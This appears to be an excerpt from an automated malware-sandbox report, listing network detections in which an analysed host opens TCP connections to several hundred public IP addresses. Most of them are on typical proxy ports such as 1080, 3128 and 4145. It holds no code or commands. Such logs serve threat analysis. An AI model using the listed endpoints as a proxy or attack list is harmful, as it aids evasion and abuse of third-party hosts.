                  Source: unknownNetwork traffic detected: HTTP traffic on port 50975 -> 20317
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51426 -> 1081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51496 -> 3051
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51498 -> 4595
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50807 -> 8282
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51457 -> 10000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51494 -> 8623
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51429 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51506 -> 12334
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51425 -> 8880
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51423 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51452 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51424 -> 9090
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51147 -> 54917
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51387 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51462 -> 55555
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51565 -> 1403
                  Source: unknownNetwork traffic detected: HTTP traffic on port 999 -> 50169
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51502 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51209 -> 64081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51579 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54240 -> 49800
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51547 -> 27391
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51485 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 5432 -> 51418
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51667 -> 8585
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51600 -> 5078
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 51427
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51488 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51466 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51557 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51567 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50296 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51555 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50163 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51154 -> 15410
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51082 -> 61634
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51673 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51715 -> 9054
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51548 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51584 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51582 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51586 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51575 -> 31679
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51585 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51713 -> 15673
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51592 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50609
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 50836
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51332 -> 40179
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51702 -> 21011
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51510 -> 38832
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51743 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 24834
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51518 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51733 -> 12334
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51599 -> 29985
                  Source: unknownNetwork traffic detected: HTTP traffic on port 10513 -> 51140
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 51279
                  Source: unknownNetwork traffic detected: HTTP traffic on port 10010 -> 51395
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50899 -> 58851
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51078 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51255 -> 2512
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51180 -> 18936
                  Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 51370
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51574 -> 6147
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 58740
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51601 -> 15673
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51552 -> 9002
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51537 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51631 -> 15673
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8585 -> 51667
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51040 -> 52326
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51616 -> 5039
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51758 -> 6705
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51206 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51704 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51646 -> 10007
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51660 -> 29380
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51774 -> 13175
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51849 -> 8111
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51803 -> 2411
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51833 -> 9827
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51883 -> 4833
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51687 -> 1081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51837 -> 999
                  Source: unknownNetwork traffic detected: IP country count 30
                  Source: global trafficTCP traffic: 192.168.2.9:49718 -> 162.241.6.97:44607
                  Source: global trafficTCP traffic: 192.168.2.9:49715 -> 203.161.32.242:50640
                  Source: global trafficTCP traffic: 192.168.2.9:49717 -> 91.187.55.39:5678
                  Source: global trafficTCP traffic: 192.168.2.9:49716 -> 103.186.8.162:8080
                  Source: global trafficTCP traffic: 192.168.2.9:49720 -> 103.141.66.78:8080
                  Source: global trafficTCP traffic: 192.168.2.9:49721 -> 103.169.130.46:8080
                  Source: global trafficTCP traffic: 192.168.2.9:49723 -> 45.11.95.165:5212
                  Source: global trafficTCP traffic: 192.168.2.9:49724 -> 45.77.111.135:15082
                  Source: global trafficTCP traffic: 192.168.2.9:49725 -> 20.219.180.149:3129
                  Source: global trafficTCP traffic: 192.168.2.9:49726 -> 160.248.80.91:587
                  Source: global trafficTCP traffic: 192.168.2.9:49728 -> 154.72.90.74:8081
                  Source: global trafficTCP traffic: 192.168.2.9:49729 -> 103.26.108.118:84
                  Source: global trafficTCP traffic: 192.168.2.9:49730 -> 92.204.134.38:9375
                  Source: global trafficTCP traffic: 192.168.2.9:49731 -> 72.167.222.113:48892
                  Source: global trafficTCP traffic: 192.168.2.9:49732 -> 79.110.196.145:8081
                  Source: global trafficTCP traffic: 192.168.2.9:49735 -> 152.32.78.24:4145
                  Source: global trafficTCP traffic: 192.168.2.9:49736 -> 201.20.67.70:8080
                  Source: global trafficTCP traffic: 192.168.2.9:49737 -> 47.91.110.154:1080
                  Source: global trafficTCP traffic: 192.168.2.9:49738 -> 117.70.49.235:8089
                  Source: global trafficTCP traffic: 192.168.2.9:49739 -> 162.241.70.64:49478
                  Source: global trafficTCP traffic: 192.168.2.9:49740 -> 14.103.24.148:8000
                  Source: global trafficTCP traffic: 192.168.2.9:49741 -> 207.180.234.220:37736
                  Source: global trafficTCP traffic: 192.168.2.9:49742 -> 85.120.30.66:33590
                  Source: global trafficTCP traffic: 192.168.2.9:49744 -> 142.54.237.34:4145
                  Source: global trafficTCP traffic: 192.168.2.9:49745 -> 3.24.58.156:3128
                  Source: global trafficTCP traffic: 192.168.2.9:49746 -> 43.133.136.208:8800
                  Source: global trafficTCP traffic: 192.168.2.9:49747 -> 200.174.198.95:8888
                  Source: global trafficTCP traffic: 192.168.2.9:49748 -> 45.56.220.210:59920
                  Source: global trafficTCP traffic: 192.168.2.9:49749 -> 103.226.232.188:3125
                  Source: global trafficTCP traffic: 192.168.2.9:49751 -> 116.97.240.147:4995
                  Source: global trafficTCP traffic: 192.168.2.9:49752 -> 143.255.140.28:5678
                  Source: global trafficTCP traffic: 192.168.2.9:49753 -> 113.53.3.242:8081
                  Source: global trafficTCP traffic: 192.168.2.9:49754 -> 103.167.68.255:8080
                  Source: global trafficTCP traffic: 192.168.2.9:49755 -> 122.152.53.25:5678
                  Source: global trafficTCP traffic: 192.168.2.9:49756 -> 51.222.241.157:40351
                  Source: global trafficTCP traffic: 192.168.2.9:49757 -> 72.10.160.90:30951
                  Source: global trafficTCP traffic: 192.168.2.9:49758 -> 8.209.255.13:3128
                  Source: global trafficTCP traffic: 192.168.2.9:49759 -> 162.214.90.49:58740
                  Source: global trafficTCP traffic: 192.168.2.9:49760 -> 194.4.50.91:12334
                  Source: global trafficTCP traffic: 192.168.2.9:49761 -> 103.199.155.18:6969
                  Source: global trafficTCP traffic: 192.168.2.9:49763 -> 208.109.14.49:22881
                  Source: global trafficTCP traffic: 192.168.2.9:49764 -> 91.213.119.246:31551
                  Source: global trafficTCP traffic: 192.168.2.9:49765 -> 20.24.43.214:8123
                  Source: global trafficTCP traffic: 192.168.2.9:49766 -> 178.212.51.79:5678
                  Source: global trafficTCP traffic: 192.168.2.9:49767 -> 103.127.106.249:8090
                  Source: global trafficTCP traffic: 192.168.2.9:49768 -> 185.108.141.19:8080
                  Source: global trafficTCP traffic: 192.168.2.9:49769 -> 138.36.150.16:1080
                  Source: global trafficTCP traffic: 192.168.2.9:49771 -> 67.43.228.252:4495
                  Source: global trafficTCP traffic: 192.168.2.9:49772 -> 92.205.61.38:24183
                  Source: global trafficTCP traffic: 192.168.2.9:49773 -> 162.243.102.207:9764
                  Source: global trafficTCP traffic: 192.168.2.9:49776 -> 46.245.77.52:3128
                  Source: global trafficTCP traffic: 192.168.2.9:49777 -> 45.229.10.98:8402
                  Source: global trafficTCP traffic: 192.168.2.9:49778 -> 43.155.165.196:15673
                  Source: global trafficTCP traffic: 192.168.2.9:49780 -> 20.37.207.8:8080
                  Source: global trafficTCP traffic: 192.168.2.9:49781 -> 67.43.228.254:28971
                  Source: global trafficTCP traffic: 192.168.2.9:49782 -> 162.241.50.179:37876
                  Source: global trafficTCP traffic: 192.168.2.9:49784 -> 131.100.48.75:999
                  Source: global trafficTCP traffic: 192.168.2.9:49785 -> 149.126.101.162:8080
                  Source: global trafficTCP traffic: 192.168.2.9:49786 -> 51.81.89.146:50605
                  Source: global trafficTCP traffic: 192.168.2.9:49787 -> 212.231.197.29:4145
                  Source: global trafficTCP traffic: 192.168.2.9:49788 -> 42.200.196.208:8080
                  Source: global trafficTCP traffic: 192.168.2.9:49790 -> 67.43.228.253:31033
                  Source: global trafficTCP traffic: 192.168.2.9:49792 -> 186.248.87.172:5678
                  Source: global trafficTCP traffic: 192.168.2.9:49794 -> 103.114.53.2:8080
                  Source: global trafficTCP traffic: 192.168.2.9:49795 -> 64.227.108.25:31908
                  Source: global trafficTCP traffic: 192.168.2.9:49796 -> 45.178.133.60:999
                  Source: global trafficTCP traffic: 192.168.2.9:49798 -> 200.106.184.97:999
                  Source: global trafficTCP traffic: 192.168.2.9:49799 -> 201.71.3.60:999
                  Source: global trafficTCP traffic: 192.168.2.9:49800 -> 200.25.254.193:54240
                  Source: global trafficTCP traffic: 192.168.2.9:49802 -> 114.231.45.101:8089
                  Source: global trafficTCP traffic: 192.168.2.9:49804 -> 115.248.66.131:3129
                  Source: global trafficTCP traffic: 192.168.2.9:49806 -> 171.244.140.160:37400
                  Source: global trafficTCP traffic: 192.168.2.9:49807 -> 193.239.56.84:8081
                  Source: global trafficTCP traffic: 192.168.2.9:49808 -> 14.207.41.71:8080
                  Source: global trafficTCP traffic: 192.168.2.9:49809 -> 196.202.40.17:3128
                  Source: global trafficTCP traffic: 192.168.2.9:49810 -> 185.82.87.30:1080
                  Source: global trafficTCP traffic: 192.168.2.9:49811 -> 157.100.63.69:999
                  Source: global trafficTCP traffic: 192.168.2.9:49812 -> 184.181.217.194:4145
                  Source: global trafficTCP traffic: 192.168.2.9:49813 -> 188.124.15.13:3629
                  Source: global trafficTCP traffic: 192.168.2.9:49815 -> 103.8.164.16:1111
                  Source: global trafficTCP traffic: 192.168.2.9:49816 -> 193.106.57.96:5678
                  Source: global trafficTCP traffic: 192.168.2.9:49818 -> 103.190.54.141:8080
                  Source: global trafficTCP traffic: 192.168.2.9:49820 -> 115.127.112.74:8090
                  Source: global trafficTCP traffic: 192.168.2.9:49821 -> 72.10.160.171:26315
                  Source: global trafficTCP traffic: 192.168.2.9:49822 -> 193.239.86.249:3128
                  Source: global trafficTCP traffic: 192.168.2.9:49823 -> 5.180.19.140:1080
                  Source: global trafficTCP traffic: 192.168.2.9:49824 -> 45.181.123.145:999
                  Source: global trafficTCP traffic: 192.168.2.9:49826 -> 193.34.21.200:8080
                  Source: global trafficTCP traffic: 192.168.2.9:49827 -> 147.75.92.251:9401
                  Source: global trafficTCP traffic: 192.168.2.9:49828 -> 15.236.106.236:3128
                  Source: global trafficTCP traffic: 192.168.2.9:49829 -> 45.228.147.209:5678
                  Source: global trafficTCP traffic: 192.168.2.9:49830 -> 93.171.243.253:1080
                  Source: global trafficTCP traffic: 192.168.2.9:49831 -> 67.43.227.228:9039
                  Source: global trafficTCP traffic: 192.168.2.9:49832 -> 123.108.98.108:5678
                  Source: global trafficTCP traffic: 192.168.2.9:49833 -> 163.172.147.9:16379
                  Source: global trafficTCP traffic: 192.168.2.9:49834 -> 220.248.70.237:9002
                  Source: global trafficTCP traffic: 192.168.2.9:49835 -> 58.234.116.197:8197
                  Source: global trafficTCP traffic: 192.168.2.9:49837 -> 92.204.135.37:55019
                  Source: global trafficTCP traffic: 192.168.2.9:49839 -> 20.204.212.76:3129
                  Source: global trafficTCP traffic: 192.168.2.9:49840 -> 155.50.241.99:3128
                  Source: global trafficTCP traffic: 192.168.2.9:49842 -> 5.252.23.220:1080
                  Source: global trafficTCP traffic: 192.168.2.9:49843 -> 160.19.169.208:8080
                  Source: global trafficTCP traffic: 192.168.2.9:49844 -> 132.148.129.254:60781
                  Source: global trafficTCP traffic: 192.168.2.9:49846 -> 123.182.58.221:8089
                  Source: global trafficTCP traffic: 192.168.2.9:49847 -> 178.158.197.147:3629
                  Source: global trafficTCP traffic: 192.168.2.9:49848 -> 178.128.207.96:18877
                  Source: global trafficTCP traffic: 192.168.2.9:49849 -> 181.65.169.37:999
                  Source: global trafficTCP traffic: 192.168.2.9:49850 -> 85.117.60.162:8080
                  Source: global trafficTCP traffic: 192.168.2.9:49851 -> 5.44.42.115:58386
                  Source: global trafficTCP traffic: 192.168.2.9:49852 -> 1.194.236.229:5005
                  Source: global trafficTCP traffic: 192.168.2.9:49853 -> 98.162.25.29:31679
                  Source: global trafficTCP traffic: 192.168.2.9:49854 -> 186.251.255.73:31337
                  Source: global trafficTCP traffic: 192.168.2.9:49855 -> 190.2.104.201:4153
                  Source: global trafficTCP traffic: 192.168.2.9:49856 -> 174.64.199.82:4145
                  Source: global trafficTCP traffic: 192.168.2.9:49858 -> 181.212.45.228:8080
                  Source: global trafficTCP traffic: 192.168.2.9:49859 -> 51.75.126.150:36694
                  Source: global trafficTCP traffic: 192.168.2.9:49860 -> 176.88.166.218:8080
                  Source: global trafficTCP traffic: 192.168.2.9:49861 -> 103.168.164.94:83
                  Source: global trafficTCP traffic: 192.168.2.9:49862 -> 184.170.249.65:4145
                  Source: global trafficTCP traffic: 192.168.2.9:49863 -> 179.1.192.27:999
                  Source: global trafficTCP traffic: 192.168.2.9:49864 -> 51.81.186.179:51405
                  Source: global trafficTCP traffic: 192.168.2.9:49865 -> 92.205.110.118:15430
                  Source: global trafficTCP traffic: 192.168.2.9:49867 -> 161.97.163.52:64120
                  Source: global trafficTCP traffic: 192.168.2.9:49868 -> 105.174.40.54:8080
                  Source: global trafficTCP traffic: 192.168.2.9:49869 -> 45.190.78.50:999
                  Source: global trafficTCP traffic: 192.168.2.9:49870 -> 168.228.36.22:27234
                  Source: global trafficTCP traffic: 192.168.2.9:49871 -> 212.108.145.195:9090
                  Source: global trafficTCP traffic: 192.168.2.9:49873 -> 88.202.230.103:17045
                  Source: global trafficTCP traffic: 192.168.2.9:49874 -> 103.78.96.146:8181
                  Source: global trafficTCP traffic: 192.168.2.9:49876 -> 87.76.1.251:8080
                  Source: global trafficTCP traffic: 192.168.2.9:49877 -> 193.143.1.201:4444
                  Source: global trafficTCP traffic: 192.168.2.9:49878 -> 34.85.177.170:3128
                  Source: global trafficTCP traffic: 192.168.2.9:49879 -> 103.234.26.163:9990
                  Source: global trafficTCP traffic: 192.168.2.9:49880 -> 1.15.62.12:5678
                  Source: global trafficTCP traffic: 192.168.2.9:49881 -> 160.16.90.35:3128
                  Source: global trafficTCP traffic: 192.168.2.9:49884 -> 18.134.236.231:3128
                  Source: global trafficTCP traffic: 192.168.2.9:49885 -> 176.119.227.65:5678
                  Source: global trafficTCP traffic: 192.168.2.9:49886 -> 123.30.154.171:7777
                  Source: global trafficTCP traffic: 192.168.2.9:49887 -> 41.217.220.214:32650
                  Source: global trafficTCP traffic: 192.168.2.9:49888 -> 178.128.156.219:8000
                  Source: global trafficTCP traffic: 192.168.2.9:49889 -> 184.178.172.14:4145
                  Source: global trafficTCP traffic: 192.168.2.9:49890 -> 89.187.216.58:1080
                  Source: global trafficTCP traffic: 192.168.2.9:49891 -> 51.15.254.129:16379
                  Source: global trafficTCP traffic: 192.168.2.9:49892 -> 186.251.255.105:31337
                  Source: global trafficTCP traffic: 192.168.2.9:49894 -> 103.147.247.79:8080
                  Source: global trafficTCP traffic: 192.168.2.9:49895 -> 94.131.106.196:3128
                  Source: global trafficTCP traffic: 192.168.2.9:49896 -> 162.241.46.69:53783
                  Source: global trafficTCP traffic: 192.168.2.9:49899 -> 95.47.149.8:8080
                  Source: global trafficTCP traffic: 192.168.2.9:49901 -> 166.62.121.127:45248
                  Source: global trafficTCP traffic: 192.168.2.9:49900 -> 173.212.250.16:64768
                  Source: global trafficTCP traffic: 192.168.2.9:49902 -> 162.214.225.223:49806
                  Source: global trafficTCP traffic: 192.168.2.9:49903 -> 173.224.20.136:5678
                  Source: global trafficTCP traffic: 192.168.2.9:49904 -> 119.28.60.64:8090
                  Source: global trafficTCP traffic: 192.168.2.9:49905 -> 103.153.232.41:8080
                  Source: global trafficTCP traffic: 192.168.2.9:49906 -> 202.165.47.90:55443
                  Source: global trafficTCP traffic: 192.168.2.9:49907 -> 103.169.254.186:8061
                  Source: global trafficTCP traffic: 192.168.2.9:49908 -> 50.233.111.162:32100
                  Source: global trafficTCP traffic: 192.168.2.9:49909 -> 65.109.152.88:8888
                  Source: global trafficTCP traffic: 192.168.2.9:49910 -> 88.211.85.169:42931
                  Source: global trafficTCP traffic: 192.168.2.9:49911 -> 104.238.111.107:5484
                  Source: global trafficTCP traffic: 192.168.2.9:49912 -> 103.112.128.37:9091
                  Source: global trafficTCP traffic: 192.168.2.9:49914 -> 194.182.187.78:3128
                  Source: global trafficTCP traffic: 192.168.2.9:49915 -> 45.90.104.150:9090
                  Source: global trafficTCP traffic: 192.168.2.9:49917 -> 46.0.203.186:8080
                  Source: global trafficTCP traffic: 192.168.2.9:49920 -> 72.10.160.92:5775
                  Source: global trafficTCP traffic: 192.168.2.9:49921 -> 41.33.203.115:1974
                  Source: global trafficTCP traffic: 192.168.2.9:49922 -> 5.252.23.249:3128
                  Source: global trafficTCP traffic: 192.168.2.9:49924 -> 37.187.77.58:10710
                  Source: global trafficTCP traffic: 192.168.2.9:49927 -> 178.158.166.161:3128
                  Source: global trafficTCP traffic: 192.168.2.9:49928 -> 92.247.12.136:9510
                  Source: global trafficTCP traffic: 192.168.2.9:49931 -> 181.78.13.91:5678
                  Source: global trafficTCP traffic: 192.168.2.9:49932 -> 57.128.163.242:8080
                  Source: global trafficTCP traffic: 192.168.2.9:49933 -> 162.214.197.102:58740
                  Source: global trafficTCP traffic: 192.168.2.9:49934 -> 211.222.252.187:8193
                  Source: global trafficTCP traffic: 192.168.2.9:49935 -> 47.254.90.125:8888
                  Source: global trafficTCP traffic: 192.168.2.9:49937 -> 43.131.245.216:15673
                  Source: global trafficTCP traffic: 192.168.2.9:49941 -> 176.213.141.107:8080
                  Source: global trafficTCP traffic: 192.168.2.9:49942 -> 148.72.209.174:12446
                  Source: global trafficTCP traffic: 192.168.2.9:49943 -> 8.142.132.204:18080
                  Source: global trafficTCP traffic: 192.168.2.9:49944 -> 103.115.242.192:8080
                  Source: global trafficTCP traffic: 192.168.2.9:49946 -> 41.65.236.56:1981
                  Source: global trafficTCP traffic: 192.168.2.9:49947 -> 94.124.16.218:8901
                  Source: global trafficTCP traffic: 192.168.2.9:49949 -> 38.253.232.2:8080
                  Source: global trafficTCP traffic: 192.168.2.9:49951 -> 36.90.61.224:4145
                  Source: global trafficTCP traffic: 192.168.2.9:49952 -> 190.113.40.202:999
                  Source: global trafficTCP traffic: 192.168.2.9:49954 -> 72.10.164.178:18067
                  Source: global trafficTCP traffic: 192.168.2.9:49956 -> 103.234.27.153:1080
                  Source: global trafficTCP traffic: 192.168.2.9:49957 -> 103.76.253.66:3129
                  Source: global trafficTCP traffic: 192.168.2.9:49958 -> 38.156.73.54:8080
                  Source: global trafficTCP traffic: 192.168.2.9:49960 -> 137.59.48.20:8080
                  Source: global trafficTCP traffic: 192.168.2.9:49961 -> 178.245.145.234:3128
                  Source: global trafficTCP traffic: 192.168.2.9:49963 -> 162.215.219.157:48117
                  Source: global trafficTCP traffic: 192.168.2.9:49964 -> 170.239.205.1:999
                  Source: global trafficTCP traffic: 192.168.2.9:49965 -> 51.89.173.40:55198
                  Source: global trafficTCP traffic: 192.168.2.9:49967 -> 67.43.236.18:17145
                  Source: global trafficTCP traffic: 192.168.2.9:49969 -> 35.237.210.215:3128
                  Source: global trafficTCP traffic: 192.168.2.9:49970 -> 159.223.71.71:59243
                  Source: global trafficTCP traffic: 192.168.2.9:49971 -> 51.15.242.202:8888
                  Source: global trafficTCP traffic: 192.168.2.9:49973 -> 36.255.104.1:13623
                  Source: global trafficTCP traffic: 192.168.2.9:49974 -> 41.128.148.76:1976
                  Source: global trafficTCP traffic: 192.168.2.9:49975 -> 195.154.172.161:3128
                  Source: global trafficTCP traffic: 192.168.2.9:49977 -> 38.156.72.135:8888
                  Source: global trafficTCP traffic: 192.168.2.9:49978 -> 142.54.229.249:4145
                  Source: global trafficTCP traffic: 192.168.2.9:49980 -> 85.94.24.29:1488
                  Source: global trafficTCP traffic: 192.168.2.9:49984 -> 107.180.88.173:59820
                  Source: global trafficTCP traffic: 192.168.2.9:49983 -> 92.118.132.125:8080
                  Source: global trafficTCP traffic: 192.168.2.9:49985 -> 132.148.245.169:38117
                  Source: global trafficTCP traffic: 192.168.2.9:49987 -> 67.43.227.226:25639
                  Source: global trafficTCP traffic: 192.168.2.9:49988 -> 182.140.244.163:8118
                  Source: global trafficTCP traffic: 192.168.2.9:49989 -> 163.172.171.22:16379
                  Source: global trafficTCP traffic: 192.168.2.9:49990 -> 190.97.238.89:999
                  Source: global trafficTCP traffic: 192.168.2.9:49992 -> 103.176.116.171:32650
                  Source: global trafficTCP traffic: 192.168.2.9:49993 -> 125.99.106.250:3128
                  Source: global trafficTCP traffic: 192.168.2.9:49994 -> 103.130.112.253:5678
                  Source: global trafficTCP traffic: 192.168.2.9:49995 -> 167.172.109.12:37355
                  Source: global trafficTCP traffic: 192.168.2.9:49996 -> 178.236.122.164:5678
                  Source: global trafficTCP traffic: 192.168.2.9:49997 -> 202.142.167.210:1080
                  Source: global trafficTCP traffic: 192.168.2.9:49998 -> 103.212.93.241:45639
                  Source: global trafficTCP traffic: 192.168.2.9:49999 -> 147.75.34.86:10003
                  Source: global trafficTCP traffic: 192.168.2.9:50000 -> 148.72.23.56:60069
                  Source: global trafficTCP traffic: 192.168.2.9:50001 -> 120.37.121.209:9091
                  Source: global trafficTCP traffic: 192.168.2.9:50003 -> 185.200.37.245:8080
                  Source: global trafficTCP traffic: 192.168.2.9:50005 -> 163.172.165.36:16379
                  Source: global trafficTCP traffic: 192.168.2.9:50008 -> 51.178.43.147:3128
                  Source: global trafficTCP traffic: 192.168.2.9:50007 -> 66.29.128.246:34350
                  Source: global trafficTCP traffic: 192.168.2.9:50010 -> 191.103.219.225:48612
                  Source: global trafficTCP traffic: 192.168.2.9:50012 -> 107.180.88.41:24834
                  Source: global trafficTCP traffic: 192.168.2.9:50013 -> 110.74.195.2:4153
                  Source: global trafficTCP traffic: 192.168.2.9:50016 -> 178.128.148.69:3128
                  Source: global trafficTCP traffic: 192.168.2.9:50018 -> 131.0.87.225:52017
                  Source: global trafficTCP traffic: 192.168.2.9:50019 -> 95.164.89.123:8888
                  Source: global trafficTCP traffic: 192.168.2.9:50020 -> 72.10.160.170:5385
                  Source: global trafficTCP traffic: 192.168.2.9:50023 -> 139.255.132.68:1080
                  Source: global trafficTCP traffic: 192.168.2.9:50024 -> 67.43.236.20:31295
                  Source: global trafficTCP traffic: 192.168.2.9:50025 -> 59.92.70.176:3127
                  Source: global trafficTCP traffic: 192.168.2.9:50027 -> 158.247.207.153:3030
                  Source: global trafficTCP traffic: 192.168.2.9:50030 -> 111.8.155.54:7777
                  Source: global trafficTCP traffic: 192.168.2.9:50031 -> 179.43.8.16:8088
                  Source: global trafficTCP traffic: 192.168.2.9:50032 -> 51.158.64.130:16379
                  Source: global trafficTCP traffic: 192.168.2.9:50033 -> 164.92.86.113:57391
                  Source: global trafficTCP traffic: 192.168.2.9:50034 -> 200.52.148.10:999
                  Source: global trafficTCP traffic: 192.168.2.9:50035 -> 195.154.43.184:19058
                  Source: global trafficTCP traffic: 192.168.2.9:50036 -> 207.180.198.241:42581
                  Source: global trafficTCP traffic: 192.168.2.9:50037 -> 103.231.248.98:3128
                  Source: global trafficTCP traffic: 192.168.2.9:50038 -> 67.43.228.251:26087
                  Source: global trafficTCP traffic: 192.168.2.9:50039 -> 103.159.46.2:83
                  Source: global trafficTCP traffic: 192.168.2.9:50040 -> 62.171.131.101:25847
                  Source: global trafficTCP traffic: 192.168.2.9:50042 -> 147.124.212.31:11070
                  Source: global trafficTCP traffic: 192.168.2.9:50041 -> 137.184.200.42:8000
                  Source: global trafficTCP traffic: 192.168.2.9:50044 -> 111.225.152.42:8089
                  Source: global trafficTCP traffic: 192.168.2.9:50045 -> 51.15.142.4:16379
                  Source: global trafficTCP traffic: 192.168.2.9:50047 -> 162.144.121.232:27262
                  Source: global trafficTCP traffic: 192.168.2.9:50048 -> 113.100.209.184:3128
                  Source: global trafficTCP traffic: 192.168.2.9:50050 -> 103.83.105.167:4153
                  Source: global trafficTCP traffic: 192.168.2.9:50053 -> 167.249.29.218:999
                  Source: global trafficTCP traffic: 192.168.2.9:50054 -> 167.86.102.169:16823
                  Source: global trafficTCP traffic: 192.168.2.9:50056 -> 20.219.177.85:3129
                  Source: global trafficTCP traffic: 192.168.2.9:50057 -> 14.103.24.20:8000
                  Source: global trafficTCP traffic: 192.168.2.9:50058 -> 202.166.219.80:4153
                  Source: global trafficTCP traffic: 192.168.2.9:50059 -> 81.19.3.249:10080
                  Source: global trafficTCP traffic: 192.168.2.9:50060 -> 45.11.95.166:6014
                  Source: global trafficTCP traffic: 192.168.2.9:50061 -> 103.77.50.168:8080
                  Source: global trafficTCP traffic: 192.168.2.9:50062 -> 202.165.47.49:5678
                  Source: global trafficTCP traffic: 192.168.2.9:50063 -> 103.83.178.205:2016
                  Source: global trafficTCP traffic: 192.168.2.9:50064 -> 58.84.32.118:5678
                  Source: global trafficTCP traffic: 192.168.2.9:50065 -> 74.62.179.122:8080
                  Source: global trafficTCP traffic: 192.168.2.9:50067 -> 162.214.191.209:58275
                  Source: global trafficTCP traffic: 192.168.2.9:50066 -> 174.64.199.79:4145
                  Source: global trafficTCP traffic: 192.168.2.9:50069 -> 202.179.184.44:5430
                  Source: global trafficTCP traffic: 192.168.2.9:50071 -> 94.186.234.236:8080
                  Source: global trafficTCP traffic: 192.168.2.9:50072 -> 201.170.180.188:8080
                  Source: global trafficTCP traffic: 192.168.2.9:50073 -> 223.25.98.82:5678
                  Source: global trafficTCP traffic: 192.168.2.9:50074 -> 93.171.220.229:8888
                  Source: global trafficTCP traffic: 192.168.2.9:50075 -> 98.64.169.17:8080
                  Source: global trafficTCP traffic: 192.168.2.9:50076 -> 119.81.71.27:8123
                  Source: global trafficTCP traffic: 192.168.2.9:50078 -> 86.110.189.118:42539
                  Source: global trafficTCP traffic: 192.168.2.9:50079 -> 58.69.201.117:8082
                  Source: global trafficTCP traffic: 192.168.2.9:50080 -> 49.228.131.169:5000
                  Source: global trafficTCP traffic: 192.168.2.9:50081 -> 77.242.24.241:8089
                  Source: global trafficTCP traffic: 192.168.2.9:50082 -> 122.52.196.36:8080
                  Source: global trafficTCP traffic: 192.168.2.9:50084 -> 93.42.151.10:8080
